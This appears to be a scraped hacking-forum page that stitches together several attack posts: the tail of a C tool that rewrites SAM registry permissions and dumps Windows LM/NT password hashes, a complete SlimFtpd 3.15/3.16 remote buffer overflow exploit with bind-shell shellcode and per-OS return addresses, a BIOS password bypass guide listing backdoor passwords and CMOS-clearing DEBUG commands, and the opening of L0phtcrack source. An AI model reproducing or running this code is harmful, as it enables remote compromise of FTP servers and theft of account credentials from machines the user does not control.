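    	sid_to_key1(rid,(unsigned char *)deskey1);
    	des_set_key((des_cblock *)deskey1,ks1);
    	sid_to_key2(rid,(unsigned char *)deskey2);
    	des_set_key((des_cblock *)deskey2,ks2);
    
    	pw = data + pw_offset;
    	/* Decrypt the lanman password hash as two 8 byte blocks. */
    	des_ecb_encrypt((des_cblock *)pw,
    					(des_cblock *)lanman, ks1, DES_DECRYPT);
    	des_ecb_encrypt((des_cblock *)(pw + 8),
    					(des_cblock *)&lanman[8], ks2, DES_DECRYPT);
    
    	pw += 16;
    	/* Decrypt the NT md4 password hash as two 8 byte blocks. */
    	des_ecb_encrypt((des_cblock *)pw,
    					(des_cblock *)md4, ks1, DES_DECRYPT);
    	des_ecb_encrypt((des_cblock *)(pw + 8),
    					(des_cblock *)&md4[8], ks2, DES_DECRYPT);
    
    	*got_lanman = 1;
    	*got_md4 = 1;
    	return 0;
    
    fail:
    	/* free(0) is a no-op, so the strings not yet allocated are safe. */
    	free(*username);
    	free(*fullname);
    	free(*comment);
    	free(*homedir);
    	*username = 0;
    	*fullname = 0;
    	*comment = 0;
    	*homedir = 0;
    	return -1;
    }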
    
    /*
     * Write the 16 bytes at val to stdout as 32 upper-case hex digits,
     * with no separator and no trailing newline.
     */
    
    void print_hexval(char *val)
    {
    	const unsigned char *cur = (const unsigned char *)val;
    	const unsigned char *end = cur + 16;
    
    	while(cur < end)
    		printf("%02X", *cur++);
    }
    
    /* 
     * Replace every ':', '\n' and '\r' in txt with '_', in place.
     * These are the characters that separate fields and records in the
     * colon-delimited output, so they must not appear inside a field.
     */
    
    void strip_text( char *txt )
    {
    	char *cur;
    
    	for( cur = txt; *cur != 0; cur++) {
    		switch(*cur) {
    		case ':':
    		case '\n':
    		case '\r':
    			*cur = '_';
    			break;
    		default:
    			break;
    		}
    	}
    }
    
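    /*
     * Function to dump a users smbpasswd entry onto stdout.
     *
     *   user - open registry key of one user; its "V" value is read.
     *   rid  - the user's RID, printed and used to derive the DES keys.
     *
     * Output is one line:
     *   username:rid:lanman hash:md4 hash:fullname,comment:homedir:
     * A hash field is 32 hex digits, 32 '*' when the record's password
     * area is too short, or "NO PASSWORD" padded with '*' when absent.
     *
     * Returns 0 on success, -1 on fail. A record that check_vp() cannot
     * parse is reported on stderr and skipped with return value 0.
     */
    
    int printout_smb_entry( HKEY user, DWORD rid )
    {
     	DWORD err;
    	DWORD type;
    	DWORD size = 0;
    	char *vp;
    	char lanman[16];
    	char md4_hash[16];
    	char *username;
    	char *fullname;
    	char *comment;
    	char *homedir;
    	int got_lanman;
    	int got_md4;
    
    	/* Find out how much space we need for the 'V' value. */
    	if((err = RegQueryValueEx( user, "V", 0, &type, 0, &size)) 
    								!= ERROR_SUCCESS) {
    		fprintf(stderr, "printout_smb_entry: Unable to determine size needed \
    for user 'V' value. Error was %s.\n.", str_oserr(err));
    		return -1;
    	}
    	if((vp = (char *)malloc(size)) == 0) {
    		fprintf(stderr, "printout_smb_entry: malloc fail for user entry.\n");
    		return -1;
    	}
    	if((err = RegQueryValueEx( user, "V", 0, &type, (LPBYTE)vp, &size)) 
    								!= ERROR_SUCCESS) {
    		fprintf(stderr, "printout_smb_entry: Unable to read user 'V' value. \
    Error was %s.\n.", str_oserr(err));
    		free(vp);
    		return -1;
    	}
    	/* Check heuristics */
    	if(check_vp(vp, size, &username, &fullname, &comment, 
    						&homedir, lanman, &got_lanman, 
    		               md4_hash, &got_md4, rid) != 0) {
    		fprintf(stderr, "Failed to parse entry for RID %X\n", rid);
    		free(vp);
    		/* Deliberately not an error: one bad record should not stop
    		   the enumeration of the remaining users. */
    		return 0;
    	}
    	/* Ensure username or comment don't have any nasty surprises
    	   for us such as an embedded ':' or '\n' - see multiple UNIX
    	   passwd field update security bugs for details... */
    	strip_text( username );
    	strip_text( fullname );
    	strip_text( comment );
    	/* If homedir contains a drive letter this mangles it - but it protects
    	   the integrity of the smbpasswd file. */
    	strip_text( homedir );
    
    	printf("%s:%d:", username, rid);
    	if(got_lanman) {
    		if(got_lanman == -1) /* Disabled account ? */
    			printf("********************************");
    		else
    			print_hexval(lanman);
    	} else
    		printf("NO PASSWORD*********************");
    	printf(":");
    	if(got_md4) {
    		if(got_md4 == -1)  /* Disabled account ? */
    			printf("********************************");
    		else
    			print_hexval(md4_hash);
    	} else
    		printf("NO PASSWORD*********************");
    	printf(":");
    	if(*fullname)
    		printf("%s", fullname);
    	if(*fullname && *comment)
    		printf(",");
    	if(*comment)
    		printf("%s", comment);
    	printf(":");
    	if(*homedir)					   
    		printf("%s", homedir);
    	printf(":\n");
    
    	/* All four strings were allocated by check_vp(); fullname used to
    	   be missing from this list and leaked once per user. */
    	free(username);
    	free(fullname);
    	free(comment);
    	free(homedir);
    	free(vp);
    	return 0;
    }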
    
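    /*
     * Function to go through all the user SID's - dumping out
     * their SAM values. Returns 0 on success, -1 on fail.
     *
     *   key - open handle on the Users key. The handle belongs to the
     *         caller and is never closed here: main() closes it after this
     *         call whatever the result, so closing it on the error paths
     *         as well (as this function used to) closed it twice.
     *
     * Each subkey name is parsed as a hexadecimal RID; subkeys whose name
     * parses to 0 are skipped.
     */
    
    int enumerate_users( HKEY key)
    {
    	DWORD indx = 0;
    	DWORD err;
    	DWORD rid;
    	char usersid[128];
    
    	for(;;) {
    		DWORD size = sizeof(usersid);
    		FILETIME ft;
    		HKEY subkey;
    		int rc = 0;
    
    		err = RegEnumKeyEx(	key, indx, usersid, &size, 0, 0, 0, &ft);
    		if(err != ERROR_SUCCESS)
    			break;
    		indx++;
    
    		if((err = RegOpenKeyEx( key, usersid, 0, KEY_QUERY_VALUE, &subkey)) !=
    					ERROR_SUCCESS) {
    			fprintf(stderr, "enumerate_users: Failed to open key %s to read value. \
    Error was %s.\n",
    					usersid, str_oserr(err));
    			return -1;
    		}
    
    		rid = strtoul(usersid, 0, 16);
    		/* Hack as we know there is a Names key here */
    		if(rid != 0)
    			rc = printout_smb_entry( subkey, rid );
    
    		/* Single close for the subkey on both outcomes. */
    		RegCloseKey(subkey);
    		if(rc != 0)
    			return -1;
    	}
    
    	/* The loop ends normally only when the enumeration is exhausted. */
    	return (err == ERROR_NO_MORE_ITEMS) ? 0 : -1;
    }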
    
    /*
     * Write the one-line usage text to stderr, naming the program as
     * arg0, and terminate the process with exit status -1.
     */
    void usage(const char *arg0)
    {
    	const char *fmt = "Usage: %s <\\\\machine>\n";
    
    	fprintf(stderr, fmt, arg0);
    	exit(-1);
    }
    
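    /*
     * usage: \\machine
     *
     * With no argument the local registry is used; with one argument the
     * registry of that machine is opened through RegConnectRegistry.
     *
     * What the run does to the target, in order:
     *   1. replaces the DACL on SECURITY\SAM\Domains\Account\Users, its
     *      parent keys and every user subkey (set_sam_tree_access),
     *   2. reads each user's 'V' value and prints one line per user,
     *   3. writes a fixed DACL back (restore_sam_tree_access).
     * If the process is stopped between steps 1 and 3 the keys keep the
     * widened DACL. For whoever administers or monitors the machine, the
     * DACL writes on these keys are the observable side effect of a run;
     * whether they are logged depends on the auditing configured there.
     *
     * Returns 0 when everything succeeded, -1 otherwise (including when
     * the dump or the final DACL write failed, which used to be ignored).
     */
    
    int main(int argc, char **argv)
    {
    	char username[128];
    	DWORD size;
    	HKEY start_key = HKEY_LOCAL_MACHINE;
    	HKEY users_key;
    	int err;
    	int status = 0;
    
    	if(argc > 2)
    		usage(argv[0]);
    
    	/*
    	 * Ensure we are running as Administrator before
    	 * we will run. This compares the account *name* only; it says
    	 * nothing about the privileges the process actually holds.
    	 */
    	size = sizeof(username);
    	if(GetUserName(username, &size)== FALSE) {
    		fprintf(stderr, "%s: GetUserName() failed. Error was %s.", 
    			argv[0], str_oserr(GetLastError()));
    		return -1;
    	}
    
    	if(stricmp( "Administrator", username) != 0) {
    		fprintf(stderr, "%s: You must be running as user Administrator \
    to run this program\n", argv[0]);
    		return -1;
    	}
    
    	/* 
    	 * Open a connection to the remote machines registry.
    	 */
    	if(argc == 2) {
    		if((err = RegConnectRegistry( argv[1], HKEY_LOCAL_MACHINE, &start_key)) !=
    			ERROR_SUCCESS) {
    			fprintf(stderr, "%s: Failed to connect to registry on remote computer %s.\
    Error was %s.\n", argv[0], argv[1], str_oserr(err));
    			return -1;
    		}
    	}
    
    	/* 
    	 * We need to get to HKEY_LOCAL_MACHINE\SECURITY\SAM\Domains\Account\Users.
    	 * The security on this key normally doesn't allow Administrators
    	 * to read - we need to add this.
    	 */
    
    	if((err = set_sam_tree_access( start_key, &users_key)) != 0) {
    		/* -2 means some DACLs were already rewritten: undo them. */
    		if(err == -2)
    			restore_sam_tree_access( start_key);
    		if(start_key != HKEY_LOCAL_MACHINE)
    			RegCloseKey(start_key);
    		return -1;
    	}
    
    	/* Print the users SAM entries in smbpasswd format onto stdout. */
    	if(enumerate_users( users_key ) != 0)
    		status = -1;
    	RegCloseKey(users_key);
    
    	/* reset the security on the SAM - attempted even if the dump failed,
    	   and a failure here is reported because it leaves the keys with
    	   the widened DACL. */
    	if(restore_sam_tree_access( start_key ) != 0) {
    		fprintf(stderr, "%s: Failed to reset security on the SAM keys.\n", argv[0]);
    		status = -1;
    	}
    
    	if(start_key != HKEY_LOCAL_MACHINE)
    		RegCloseKey(start_key);
    	return status;
    }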





    Icon2 Remote Buffer overflow

    کد HTML:
    /*
    *
    *	Written by redsand
    *	<redsand@redsand.net>
    *
    *	Jul 22, 2005
    *	Vulnerable: SlimFtpd v3.15 and v3.16
    *	original vuln found by: 
    *
    *	Usage: ./redslim 127.0.0.1 [# OS RET ]
    *
    */
    
    
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    #ifdef WIN
      #include <winsock2.h>
      #include <windows.h>
    // #pragma lib <ws2_32.lib> // win32-lcc specific
      #pragma comment(lib, "ws2_32.lib") // ms vc++
    #else
      #include <unistd.h>
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <arpa/inet.h>
      #include <netdb.h>
    #endif
    
    
    /* Credentials sent in the USER and PASS commands below: the client
       logs in through the FTP anonymous account. */
    #define USERNAME	"anonymous"
    #define PASSWORD	"log@in.net"
    
    
    // buf size = 512 + max
    
    #define NOP				0x90	
    #define BUFSIZE			2048
    #define PORT			21
    #define LSZ				525 
    
    /* FTP command strings, used by index in main(): 0 = USER, 1 = PASS,
       2 = the "LIST " prefix of the over-long command, 3 = XMKD, 4 = CWD. */
    unsigned char *login [] = { "USER "USERNAME"\r\n", "PASS "PASSWORD"\r\n", "LIST ", "XMKD AAAAAAAA\r\n", "CWD AAAAAAAA\r\n", NULL };
    
    /* Display names for the <OS> argument; entry i belongs to offsets[i]. */
    unsigned char *targets [] =
            {
                "Windows XP SP0/SP1 ",
    			"Windows XP SP2 ",
                "Windows 2000 SP1/SP4 ",
    			"Windows 2003 Server SP1",
    			"Denial-of-Service",
                 NULL
            };
    
    /* One fixed address per entry of targets[]. Each value is tied to a
       specific Windows build, which is why the table needs one row per
       OS/service pack: the technique assumes code sits at a predictable
       address. Address-space randomisation removes that assumption.
       The 0x44434241 row (ASCII "ABCD") pairs with "Denial-of-Service";
       presumably it is an invalid address that just crashes the service. */
    unsigned long offsets [] =
            {
    			// jmp esi
    			0x71a5b80b, // Windows XP 5.1.1.0 SP1 (IA32) Windows XP 5.1.0.0 SP0 (IA32)
    			0x77f1a322, // Windows XP 5.1.2.0 SP2 (IA32)
                0x74ffbb65, // Windows 2000 5.0.1.0 SP1 (IA32) Windows 2000 5.0.4.0 SP4 (IA32)
    			0x77f7fe67, // Windows 2003 Server 5.2.1.0 SP1 (IA32)
                0x44434241,
    			0
            };
    
    unsigned char shellcode[] = "\xEB"
    "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
    "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
    "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
    "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
    "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
    "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
    "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
    "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
    "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
    "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
    "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
    "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
    "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
    "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
    "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
    "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
    "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
    "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
    "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
    "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
    "\x58\x68\x61\x63\x6B\x90";
    
    long gimmeip(char *);
    void keepout();
    void shell(int);
    
    /* Common error exit: on Windows builds release Winsock first, then
       terminate the process with status 1. Does not return. */
    void keepout()
    {
    #if defined(WIN)
       WSACleanup();
    #endif
       exit(1);
    }
    
    /* Print the two-line program banner on stdout. */
    void banner()
    {
    	fputs("- SlimFtpd v3.15 and v3.16 remote buffer overflow\n", stdout);
    	fputs("- Written by redsand (redsand [at] redsand.net)\n", stdout);
    }
    
    /* Print the banner, the command-line syntax and the numbered list of
       entries in targets[], then terminate with status 1. */
    void usage(char *prog)
    {
      int idx = 0;
    
      banner();
      printf("- Usage: %s <target ip> <OS> [target port]\n", prog);
      printf("- Targets:\n");
      while (targets[idx] != NULL) {
    	printf("\t- %d\t%s\n", idx, targets[idx]);
    	idx++;
      }
      printf("\n");
    
      exit(1);
    }
    
    /***************************************************************/
    /* Turn a host string into an IPv4 address value.
       The string is first handed to inet_addr(); when the result, stored
       in a long, is negative the name is looked up with gethostbyname()
       and the first address of the reply is copied over it. A failed
       lookup prints a message and ends the program through keepout(). */
    long gimmeip(char *hostname) {
      struct hostent *entry;
      long addr = inet_addr(hostname);
    
      if (addr >= 0)
    	return addr;
    
      entry = gethostbyname(hostname);
      if (entry == NULL) {
    	printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
    	keepout();
      }
      memcpy(&addr, entry->h_addr, entry->h_length);
    
      return addr;
    }
    
    int main(int argc, char *argv[]) {
      int sock;
      char expbuff[BUFSIZE]; 
      char recvbuff[BUFSIZE];
      void *p;
      unsigned short tport = PORT; // default port for ftp
      struct sockaddr_in target;
      unsigned long retaddr;
      int len,i=0;
      unsigned int tar;
    
    #ifdef WIN
      WSADATA wsadata;
      WSAStartup(MAKEWORD(2,0), &wsadata);
    #endif
    
    
      if(argc < 3) usage(argv[0]);
    
      if(argc == 4)
        tport = atoi(argv[3]);
    
      banner();
      tar = atoi(argv[2]);
      retaddr = offsets[tar];
    
    
      printf("- Using return address of 0x%8x : %s\n",retaddr,targets[tar]);
      printf("\n[+] Initialize socket.");
      if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
    	perror("[x] Error socket. Exiting...\n");
    	keepout();
      }
    
      memset(&target,0x00,sizeof(target));
      target.sin_family = AF_INET;
      target.sin_addr.s_addr = gimmeip(argv[1]);
      target.sin_port = htons(tport);
    
    
      printf("\n[+] Prepare exploit buffer... ");
      memset(expbuff, 0x00, BUFSIZE);
      memset(recvbuff, 0x00, BUFSIZE);
      
    
      memcpy(expbuff, login[2], strlen(login[2]));
      p =  &expbuff[strlen(login[2]) ];
     
      memset(p, NOP, LSZ);
      memcpy(&expbuff[10],shellcode,sizeof(shellcode)-1);
    
      *(unsigned long *)&expbuff[507] = retaddr;
      p =  &expbuff[511];
      memcpy(p, "\n",1);
      
      printf("\n[+] Connecting at %s:%hu...", argv[1], tport);
      fflush(stdout);
      if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) {
      	fprintf(stderr,"\n[x] Couldn't establish connection. Exiting...\n");
      	keepout();
      }
      printf(" - OK.\n");
      len = recv(sock, recvbuff, BUFSIZE-1, 0);
      if(len < 0) {
    	fprintf(stderr,"\nError response server\n");
      	exit(1);
      }
      
      printf("    - Size of payload is %d bytes",strlen(expbuff));
    
    
      printf("\n[+] Initiating exploit... ");
      printf("\n    - Sending USER...");
      if(send(sock,login[0],strlen(login[0]),0)==-1) {
    	fprintf(stderr,"\n[-] Exploit failed.\n");
    	keepout();
      }
    
      len = recv(sock, recvbuff, BUFSIZE-1,0);
      if(len < 0) {
    	fprintf(stderr,"\nError recv.");
    	exit(1);
      }
      recvbuff[len] = 0;
    
      printf("\n    - Sending PASS...");
      
      if(send(sock,login[1],strlen(login[1]),0)==-1) {
        printf("\n[-] Exploit failed.\n");
    	keepout();
      }
    
      len = recv(sock, recvbuff, BUFSIZE, 0);
      if(len < 0) {
    	fprintf(stderr,"\nError recv.");
    	exit(1);
      }
      recvbuff[len] = 0;
    
      printf("\n    - Creating X-DIR...");
      
      if(send(sock,login[3],strlen(login[3]),0)==-1) {
        printf("\n[-] Exploit failed.\n");
    	keepout();
      }
    
      len = recv(sock, recvbuff, BUFSIZE, 0);
      if(len < 0) {
    	fprintf(stderr,"\nError recv.");
    	exit(1);
      }
      recvbuff[len] = 0;
    
      if(send(sock,login[4],strlen(login[4]),0)==-1) {
        printf("\n[-] Exploit failed.\n");
    	keepout();
      }
    
      len = recv(sock, recvbuff, BUFSIZE, 0);
      if(len < 0) {
    	fprintf(stderr,"\nError recv.");
    	exit(1);
      }
      recvbuff[len] = 0;
    
      printf("\n    - Sending Exploit String...");
      if(send(sock,expbuff,strlen(expbuff),0)==-1) {
    	printf("\n[-] Exploit failed.\n");
    	keepout();
      }
    
      printf("- OK.");
      
      printf("\n[+] Now try to connect to the shell on %s:101\n", argv[1] );
    
    
    
    #ifdef WIN
      closesocket(sock);
      WSACleanup();
    #else
      close(sock);
    #endif
    
      return(0);
    }
    // persiannetworks.com





    BIOS password Bypassing

    کد HTML:
    Fellow Wrapster/BearShare/Gnutella user.
    As you can see there are various ways on bypassing/changing BIOS passwords.
    I have successfully used all of the options below on various computers many years ago.  These methods will work on computers of today.  I have updated the Standard BIOS backdoor passwords for current computers made as of last week. ( big grin ).
    READ EVERYTHING BEFORE YOU USE ANY METHOD LISTED BELOW.
    
    Basic BIOS password crack - works 9.9 times out of ten
    This is a password hack, but it works by clearing the BIOS settings, so that the next time you start the PC the CMOS does not ask for any password. If you are able to bring up a DOS prompt, you will then be able to reset the BIOS settings to their defaults. To clear the CMOS do the following:
    Get DOS prompt and type:
    DEBUG hit enter
    -o 70 2e hit enter
    -o 71 ff hit enter
    -q hit enter
    exit hit enter
    Restart the computer. It works on most versions of the AWARD BIOS. 
    
    
     
    Accessing information on the hard disk 
    
    When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk. 
    
    Standard BIOS backdoor passwords 
    The first, less invasive, attempt to bypass a BIOS password is to try one of these standard manufacturer's backdoor passwords: 
    AWARD BIOS
    AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %øåñòü ïpîáåëîâ%, %äåâÿòü ïpîáåëîâ% 
    AMI BIOS
    AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder 
    Other passwords you may try (for AMI/AWARD or other BIOSes)
    LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj 
    Note that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards (such as Italian and German ones), so -- for example -- you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian. 
    
    Flashing BIOS via software 
    If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory.
    However, it might happen you don't have one of those programs when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You'd better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands: 
    AMI/AWARD BIOS
    O 70 17
    O 71 17
    Q
    PHOENIX BIOS
    O 70 FF
    	O 71 17
    Q
    GENERIC
    Invalidates CMOS RAM.
    Should work on all AT motherboards
    (XT motherboards don't have CMOS)
    O 70 2E
    O 71 FF
    Q
    Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format. 
    
    Flashing BIOS via hardware 
    If you can't access the computer when it's on, and the standard backdoor passwords didn't work, you'll have to flash the BIOS via hardware. Please read the important notes at the end of this section before trying any of these methods. 
    Using the jumpers 
    The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard.
    To find the correct jumper you should read the motherboard's manual.
    Once you've located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.
    If you don't have the motherboard's manual, you'll have to "brute force" it... trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.
    If after flashing the BIOS, the computer won't boot when you turn it on, turn it off, and wait some seconds before to retry. 
    Removing the battery 
    If you can't find the jumper to flash the BIOS or if such jumper doesn't exist, you can remove the battery that keeps the BIOS memory alive. It's a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you'll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I'd suggest you to remove it for about one hour to be sure, because if you put it back when the data aren't erased yet you'll have to wait more time, as you've never removed it. If at first it doesn't work, try to remove the battery overnight.
    Important note: in laptop and notebooks you don't have to remove the computer's power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard. 
    Short-circuiting the chip 
    Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.
    Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip. 
    CHIPS P82C206 (square) 
    Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner). 
           gnd
           74
            |__________________
    5v 75--|                   |
           |                   |
           |                   |
           |       CHIPS       |
       1 * |                   |
           |      P82C206      |
           |                   |
           |                   |
           |___________________|
            |                 |
            | gnd             | 5v
            12                32
    OPTi F82C206 (rectangular) 
    Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge). 
        80              51
         |______________|
    81 -|                |- 50
        |                |
        |                |
        |      OPTi      |  
        |                |
        |     F82C206    |
        |                |
    100-|________________|-31
         ||           | |
       1 ||           | | 30
          3           26
    
    Dallas DS1287, DS1287A
    Benchmarq bp3287MT, bq3287AMT 
    The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.
    CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.
    The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage. 
             __________
         1 -| *  U     |-  24 5v
         2 -|          |-  23
         3 -|          |-  22
         4 -|          |-  21 RCL (RAM Clear)
         5 -|          |-  20
         6 -|          |-  19
         7 -|          |-  18
         8 -|          |-  17
         9 -|          |-  16
        10 -|          |-  15                            
        11 -|          |-  14
    gnd 12 -|__________|-  13
    
    NOTE: Although these are 24-pin chips,
    the Dallas chips may be missing 5 pins,
    these are unused pins.
    Most chips have unused pins,
    though usually they are still present. 
    
    Dallas DS12885S
    Benchmarq bq3258S
    Hitachi HD146818AP
    Samsung KS82C6818A 
    This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818.
    Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
    Short together pins 12 and 24. 
    
    
     5v
     24          20                   13
     |___________|____________________|
    |                                  |
    |             DALLAS               |
    |>                                 |
    |            DS12885S              |
    |                                  |
    |__________________________________|
     |                                |
     1                                12
                                      gnd
    
    Motorola MC146818AP 
    Short pins 12 and 24. These are the pins on diagonally opposite corners - lower left and upper right. You might also try pins 12 and 20. 
              __________
         1  -| *  U     |-  24 5v
         2  -|          |-  23
         3  -|          |-  22
         4  -|          |-  21
         5  -|          |-  20
         6  -|          |-  19
         7  -|          |-  18
         8  -|          |-  17
         9  -|          |-  16
        10  -|          |-  15
        11  -|          |-  14
    gnd 12  -|__________|-  13
    
    Replacing the chip 
    If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It's a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you'll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you'll then plug the new chip, in the eventuality that you'll have to change it again. If you can't find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer's website to see if there's the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer. 
    Important 
    Whichever method you use, when you flash the BIOS not only the password but also all the other configuration data will be reset to the factory defaults, so when you boot for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.
    Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you'll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn't see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can't find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:\WINDOWS, C:\WINDOWS\SYSTEM, or C:\WINDOWS\INF . 
    
    Key Disk for Toshiba laptops 
    Some Toshiba notebooks allow to bypass BIOS by inserting a "key-disk" in the floppy disk drive while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it's not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for "KEY" :) followed by two zeroes). Once you have created the key disk put it into the notebook's drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration where you can set a new password. 
    
    Key protected cases 
    A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it. That's all. 
     
    
    Use the Force, Nuke!!!!!!
    CinCyDNA
    
    





    Icon9 LC1.5 NT Password Cracker

    کد HTML:
    /* L0phtcrack 1.5 06.02.97 mudge@l0pht.com
       The original comments are left below for those that missed the first
